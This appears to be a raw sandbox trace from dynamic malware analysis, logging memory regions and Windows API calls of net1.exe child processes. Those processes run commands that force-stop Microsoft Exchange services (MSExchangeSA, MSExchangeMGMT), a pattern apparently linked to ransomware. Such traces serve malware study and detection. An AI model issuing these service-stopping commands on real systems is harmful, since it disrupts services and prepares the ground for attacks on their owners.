Region: id = 6975 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 6976 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 6977 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 6978 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7048 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 595 os_tid = 0xba4 [0101.472] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f750 | out: lpSystemTimeAsFileTime=0x16f750*(dwLowDateTime=0xf1a672f0, dwHighDateTime=0x1d48689)) [0101.472] GetCurrentProcessId () returned 0xba0 [0101.472] GetCurrentThreadId () returned 0xba4 [0101.472] GetTickCount () returned 0x23246 [0101.472] QueryPerformanceCounter (in: lpPerformanceCount=0x16f758 | out: lpPerformanceCount=0x16f758*=1814839000000) returned 1 [0101.474] GetModuleHandleW (lpModuleName=0x0) returned 0xff190000 [0101.474] __set_app_type (_Type=0x1) [0101.474] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff1a9c9c) returned 0x0 [0101.474] __getmainargs (in: _Argc=0xff1b4780, _Argv=0xff1b4790, _Env=0xff1b4788, _DoWildCard=0, _StartInfo=0xff1b479c | out: _Argc=0xff1b4780, _Argv=0xff1b4790, _Env=0xff1b4788) returned 0 [0101.474] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0101.474] GetConsoleOutputCP () returned 0x1b5 [0101.621] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff1bcec0 | out: lpCPInfo=0xff1bcec0) returned 1 [0101.621] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0101.623] sprintf_s (in: _DstBuf=0x16f6f8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0101.623] setlocale (category=0, locale=".437") returned="English_United States.437" [0101.625] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0101.625] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0101.625] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeSA /y" [0101.625] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x16f490, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0101.625] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0101.625] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x16f6e8 | out: Buffer=0x16f6e8*=0x294d50) returned 0x0 [0101.625] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x16f6e8 | out: Buffer=0x16f6e8*=0x29c100) returned 0x0 [0101.625] _fileno (_File=0x7fefdba2a80) returned 0 [0101.625] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0101.625] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0101.625] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0101.625] _wcsicmp (_String1="config", _String2="stop") returned -16 [0101.625] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0101.625] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0101.625] _wcsicmp (_String1="file", _String2="stop") returned -13 [0101.625] _wcsicmp (_String1="files", _String2="stop") returned -13 [0101.625] _wcsicmp (_String1="group", _String2="stop") returned -12 [0101.625] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0101.626] _wcsicmp (_String1="help", _String2="stop") returned -11 [0101.626] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0101.626] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0101.626] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0101.626] _wcsicmp (_String1="session", _String2="stop") returned -15 [0101.626] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0101.626] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0101.626] _wcsicmp (_String1="share", _String2="stop") returned -12 [0101.626] _wcsicmp (_String1="start", _String2="stop") returned -14 [0101.626] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0101.626] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0101.626] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0101.626] _wcsicmp (_String1="accounts", _String2="MSExchangeSA") returned -12 [0101.626] _wcsicmp (_String1="computer", _String2="MSExchangeSA") returned -10 [0101.626] _wcsicmp (_String1="config", _String2="MSExchangeSA") returned -10 [0101.626] _wcsicmp (_String1="continue", _String2="MSExchangeSA") returned -10 [0101.626] _wcsicmp (_String1="cont", _String2="MSExchangeSA") returned -10 [0101.626] _wcsicmp (_String1="file", _String2="MSExchangeSA") returned -7 [0101.626] _wcsicmp (_String1="files", _String2="MSExchangeSA") returned -7 [0101.626] _wcsicmp (_String1="group", _String2="MSExchangeSA") returned -6 [0101.626] _wcsicmp (_String1="groups", _String2="MSExchangeSA") returned -6 [0101.626] _wcsicmp (_String1="help", _String2="MSExchangeSA") returned -5 [0101.626] _wcsicmp (_String1="helpmsg", _String2="MSExchangeSA") returned -5 [0101.626] _wcsicmp (_String1="localgroup", _String2="MSExchangeSA") returned -1 [0101.626] _wcsicmp (_String1="pause", _String2="MSExchangeSA") returned 3 [0101.626] _wcsicmp (_String1="session", _String2="MSExchangeSA") returned 6 [0101.626] _wcsicmp (_String1="sessions", _String2="MSExchangeSA") returned 6 [0101.626] _wcsicmp (_String1="sess", _String2="MSExchangeSA") returned 6 [0101.626] _wcsicmp (_String1="share", _String2="MSExchangeSA") returned 6 [0101.626] _wcsicmp (_String1="start", _String2="MSExchangeSA") returned 6 [0101.626] _wcsicmp (_String1="stats", _String2="MSExchangeSA") returned 6 [0101.626] _wcsicmp (_String1="statistics", _String2="MSExchangeSA") returned 6 [0101.626] _wcsicmp (_String1="stop", _String2="MSExchangeSA") returned 6 [0101.626] _wcsicmp (_String1="time", _String2="MSExchangeSA") returned 7 [0101.627] _wcsicmp (_String1="user", _String2="MSExchangeSA") returned 8 [0101.627] _wcsicmp (_String1="users", _String2="MSExchangeSA") returned 8 [0101.627] _wcsicmp (_String1="msg", _String2="MSExchangeSA") returned 2 [0101.627] _wcsicmp (_String1="messenger", _String2="MSExchangeSA") returned -14 [0101.627] _wcsicmp (_String1="receiver", _String2="MSExchangeSA") returned 5 [0101.627] _wcsicmp (_String1="rcv", _String2="MSExchangeSA") returned 5 [0101.627] _wcsicmp (_String1="netpopup", _String2="MSExchangeSA") returned 1 [0101.627] _wcsicmp (_String1="redirector", _String2="MSExchangeSA") returned 5 [0101.627] _wcsicmp (_String1="redir", _String2="MSExchangeSA") returned 5 [0101.627] _wcsicmp (_String1="rdr", _String2="MSExchangeSA") returned 5 [0101.627] _wcsicmp (_String1="workstation", _String2="MSExchangeSA") returned 10 [0101.627] _wcsicmp (_String1="work", _String2="MSExchangeSA") returned 10 [0101.627] _wcsicmp (_String1="wksta", _String2="MSExchangeSA") returned 10 [0101.627] _wcsicmp (_String1="prdr", _String2="MSExchangeSA") returned 3 [0101.627] _wcsicmp (_String1="devrdr", _String2="MSExchangeSA") returned -9 [0101.627] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeSA") returned -1 [0101.627] _wcsicmp (_String1="server", _String2="MSExchangeSA") returned 6 [0101.627] _wcsicmp (_String1="svr", _String2="MSExchangeSA") returned 6 [0101.627] _wcsicmp (_String1="srv", _String2="MSExchangeSA") returned 6 [0101.627] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeSA") returned -1 [0101.627] _wcsicmp (_String1="alerter", _String2="MSExchangeSA") returned -12 [0101.627] _wcsicmp (_String1="netlogon", _String2="MSExchangeSA") returned 1 [0101.627] _wcsupr (in: _String="MSExchangeSA" | out: _String="MSEXCHANGESA") returned="MSEXCHANGESA" [0101.627] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x29ce10 [0101.631] GetServiceKeyNameW (in: hSCManager=0x29ce10, lpDisplayName="MSEXCHANGESA", lpServiceName=0xff1b5750, lpcchBuffer=0x16f608 | out: lpServiceName="", lpcchBuffer=0x16f608) returned 0 [0101.632] _wcsicmp (_String1="msg", _String2="MSEXCHANGESA") returned 2 [0101.632] _wcsicmp (_String1="messenger", _String2="MSEXCHANGESA") returned -14 [0101.632] _wcsicmp (_String1="receiver", _String2="MSEXCHANGESA") returned 5 [0101.632] _wcsicmp (_String1="rcv", _String2="MSEXCHANGESA") returned 5 [0101.632] _wcsicmp (_String1="redirector", _String2="MSEXCHANGESA") returned 5 [0101.632] _wcsicmp (_String1="redir", _String2="MSEXCHANGESA") returned 5 [0101.632] _wcsicmp (_String1="rdr", _String2="MSEXCHANGESA") returned 5 [0101.632] _wcsicmp (_String1="workstation", _String2="MSEXCHANGESA") returned 10 [0101.632] _wcsicmp (_String1="work", _String2="MSEXCHANGESA") returned 10 [0101.632] _wcsicmp (_String1="wksta", _String2="MSEXCHANGESA") returned 10 [0101.633] _wcsicmp (_String1="prdr", _String2="MSEXCHANGESA") returned 3 [0101.633] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGESA") returned -9 [0101.633] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGESA") returned -1 [0101.633] _wcsicmp (_String1="server", _String2="MSEXCHANGESA") returned 6 [0101.633] _wcsicmp (_String1="svr", _String2="MSEXCHANGESA") returned 6 [0101.633] _wcsicmp (_String1="srv", _String2="MSEXCHANGESA") returned 6 [0101.633] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGESA") returned -1 [0101.633] _wcsicmp (_String1="alerter", _String2="MSEXCHANGESA") returned -12 [0101.633] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGESA") returned 1 [0101.633] NetServiceControl (in: servername=0x0, service="MSEXCHANGESA", opcode=0x0, arg=0x0, bufptr=0x16f610 | out: bufptr=0x16f610) returned 0x889 [0101.634] wcscpy_s (in: _Destination=0xff1b80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0101.634] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0101.634] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff1b5b50, nSize=0x800, Arguments=0xff1b7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0101.636] GetFileType (hFile=0xb) returned 0x2 [0101.636] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16f4d8 | out: lpMode=0x16f4d8) returned 1 [0101.636] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff1b5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x16f4d0, lpReserved=0x0 | out: lpBuffer=0xff1b5b50*, lpNumberOfCharsWritten=0x16f4d0*=0x1e) returned 1 [0101.637] GetFileType (hFile=0xb) returned 0x2 [0101.637] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16f4d8 | out: lpMode=0x16f4d8) returned 1 [0101.637] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff191efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f4d0, lpReserved=0x0 | out: lpBuffer=0xff191efc*, lpNumberOfCharsWritten=0x16f4d0*=0x2) returned 1 [0101.637] _ultow (in: _Dest=0x889, _Radix=1504576 | out: _Dest=0x889) returned="2185" [0101.637] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff1b5b50, nSize=0x800, Arguments=0xff1b7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0101.637] GetFileType (hFile=0xb) returned 0x2 [0101.638] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16f4d8 | out: lpMode=0x16f4d8) returned 1 [0101.638] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff1b5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x16f4d0, lpReserved=0x0 | out: lpBuffer=0xff1b5b50*, lpNumberOfCharsWritten=0x16f4d0*=0x34) returned 1 [0101.638] GetFileType (hFile=0xb) returned 0x2 [0101.638] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x16f4d8 | out: lpMode=0x16f4d8) returned 1 [0101.639] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff191efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f4d0, lpReserved=0x0 | out: lpBuffer=0xff191efc*, lpNumberOfCharsWritten=0x16f4d0*=0x2) returned 1 [0101.639] NetApiBufferFree (Buffer=0x294d50) returned 0x0 [0101.639] NetApiBufferFree (Buffer=0x29c100) returned 0x0 [0101.639] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeSA /y" [0101.639] exit (_Code=2) Process: id = "165" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x58e0d000" os_pid = "0x1318" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "157" os_parent_pid = "0xa70" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeMGMT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6979 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6980 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 6981 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 6982 start_va = 0xb0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 6983 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6984 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6985 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6986 start_va = 0xff190000 end_va = 0xff1c2fff entry_point = 0xff190000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 6987 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6988 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 6989 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 6990 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 6991 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 6992 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6993 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7049 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7050 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7051 start_va = 0x130000 end_va = 0x196fff entry_point = 0x130000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7052 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 7053 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 7054 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7055 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7056 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 7057 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 7058 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 7059 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 7060 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 7061 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 7062 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 7063 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 7064 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 7065 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 7066 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7067 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7068 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7069 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7070 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7071 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7072 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 596 os_tid = 0xb94 [0101.645] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f9b0 | out: lpSystemTimeAsFileTime=0x12f9b0*(dwLowDateTime=0xf1c0a210, dwHighDateTime=0x1d48689)) [0101.645] GetCurrentProcessId () returned 0x1318 [0101.645] GetCurrentThreadId () returned 0xb94 [0101.645] GetTickCount () returned 0x232f1 [0101.645] QueryPerformanceCounter (in: lpPerformanceCount=0x12f9b8 | out: lpPerformanceCount=0x12f9b8*=1814856300000) returned 1 [0101.647] GetModuleHandleW (lpModuleName=0x0) returned 0xff190000 [0101.647] __set_app_type (_Type=0x1) [0101.647] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff1a9c9c) returned 0x0 [0101.647] __getmainargs (in: _Argc=0xff1b4780, _Argv=0xff1b4790, _Env=0xff1b4788, _DoWildCard=0, _StartInfo=0xff1b479c | out: _Argc=0xff1b4780, _Argv=0xff1b4790, _Env=0xff1b4788) returned 0 [0101.647] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0101.647] GetConsoleOutputCP () returned 0x1b5 [0101.647] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff1bcec0 | out: lpCPInfo=0xff1bcec0) returned 1 [0101.647] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0101.650] sprintf_s (in: _DstBuf=0x12f958, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0101.650] setlocale (category=0, locale=".437") returned="English_United States.437" [0101.651] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0101.651] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0101.651] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeMGMT /y" [0101.651] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12f6f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0101.652] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0101.652] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12f948 | out: Buffer=0x12f948*=0x2a4d50) returned 0x0 [0101.652] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x12f948 | out: Buffer=0x12f948*=0x2ac100) returned 0x0 [0101.652] _fileno (_File=0x7fefdba2a80) returned 0 [0101.652] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0101.652] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0101.652] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0101.652] _wcsicmp (_String1="config", _String2="stop") returned -16 [0101.652] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0101.652] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0101.652] _wcsicmp (_String1="file", _String2="stop") returned -13 [0101.652] _wcsicmp (_String1="files", _String2="stop") returned -13 [0101.652] _wcsicmp (_String1="group", _String2="stop") returned -12 [0101.652] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0101.652] _wcsicmp (_String1="help", _String2="stop") returned -11 [0101.652] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0101.652] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0101.652] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0101.652] _wcsicmp (_String1="session", _String2="stop") returned -15 [0101.652] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0101.652] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0101.652] _wcsicmp (_String1="share", _String2="stop") returned -12 [0101.653] _wcsicmp (_String1="start", _String2="stop") returned -14 [0101.653] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0101.653] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0101.653] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0101.653] _wcsicmp (_String1="accounts", _String2="MSExchangeMGMT") returned -12 [0101.653] _wcsicmp (_String1="computer", _String2="MSExchangeMGMT") returned -10 [0101.653] _wcsicmp (_String1="config", _String2="MSExchangeMGMT") returned -10 [0101.653] _wcsicmp (_String1="continue", _String2="MSExchangeMGMT") returned -10 [0101.653] _wcsicmp (_String1="cont", _String2="MSExchangeMGMT") returned -10 [0101.653] _wcsicmp (_String1="file", _String2="MSExchangeMGMT") returned -7 [0101.653] _wcsicmp (_String1="files", _String2="MSExchangeMGMT") returned -7 [0101.653] _wcsicmp (_String1="group", _String2="MSExchangeMGMT") returned -6 [0101.653] _wcsicmp (_String1="groups", _String2="MSExchangeMGMT") returned -6 [0101.653] _wcsicmp (_String1="help", _String2="MSExchangeMGMT") returned -5 [0101.653] _wcsicmp (_String1="helpmsg", _String2="MSExchangeMGMT") returned -5 [0101.653] _wcsicmp (_String1="localgroup", _String2="MSExchangeMGMT") returned -1 [0101.653] _wcsicmp (_String1="pause", _String2="MSExchangeMGMT") returned 3 [0101.653] _wcsicmp (_String1="session", _String2="MSExchangeMGMT") returned 6 [0101.653] _wcsicmp (_String1="sessions", _String2="MSExchangeMGMT") returned 6 [0101.653] _wcsicmp (_String1="sess", _String2="MSExchangeMGMT") returned 6 [0101.653] _wcsicmp (_String1="share", _String2="MSExchangeMGMT") returned 6 [0101.653] _wcsicmp (_String1="start", _String2="MSExchangeMGMT") returned 6 [0101.653] _wcsicmp (_String1="stats", _String2="MSExchangeMGMT") returned 6 [0101.653] _wcsicmp (_String1="statistics", _String2="MSExchangeMGMT") returned 6 [0101.653] _wcsicmp (_String1="stop", _String2="MSExchangeMGMT") returned 6 [0101.653] _wcsicmp (_String1="time", _String2="MSExchangeMGMT") returned 7 [0101.653] _wcsicmp (_String1="user", _String2="MSExchangeMGMT") returned 8 [0101.653] _wcsicmp (_String1="users", _String2="MSExchangeMGMT") returned 8 [0101.653] _wcsicmp (_String1="msg", _String2="MSExchangeMGMT") returned 2 [0101.653] _wcsicmp (_String1="messenger", _String2="MSExchangeMGMT") returned -14 [0101.653] _wcsicmp (_String1="receiver", _String2="MSExchangeMGMT") returned 5 [0101.653] _wcsicmp (_String1="rcv", _String2="MSExchangeMGMT") returned 5 [0101.653] _wcsicmp (_String1="netpopup", _String2="MSExchangeMGMT") returned 1 [0101.653] _wcsicmp (_String1="redirector", _String2="MSExchangeMGMT") returned 5 [0101.654] _wcsicmp (_String1="redir", _String2="MSExchangeMGMT") returned 5 [0101.654] _wcsicmp (_String1="rdr", _String2="MSExchangeMGMT") returned 5 [0101.654] _wcsicmp (_String1="workstation", _String2="MSExchangeMGMT") returned 10 [0101.654] _wcsicmp (_String1="work", _String2="MSExchangeMGMT") returned 10 [0101.654] _wcsicmp (_String1="wksta", _String2="MSExchangeMGMT") returned 10 [0101.654] _wcsicmp (_String1="prdr", _String2="MSExchangeMGMT") returned 3 [0101.654] _wcsicmp (_String1="devrdr", _String2="MSExchangeMGMT") returned -9 [0101.654] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeMGMT") returned -1 [0101.654] _wcsicmp (_String1="server", _String2="MSExchangeMGMT") returned 6 [0101.654] _wcsicmp (_String1="svr", _String2="MSExchangeMGMT") returned 6 [0101.654] _wcsicmp (_String1="srv", _String2="MSExchangeMGMT") returned 6 [0101.654] _wcsicmp 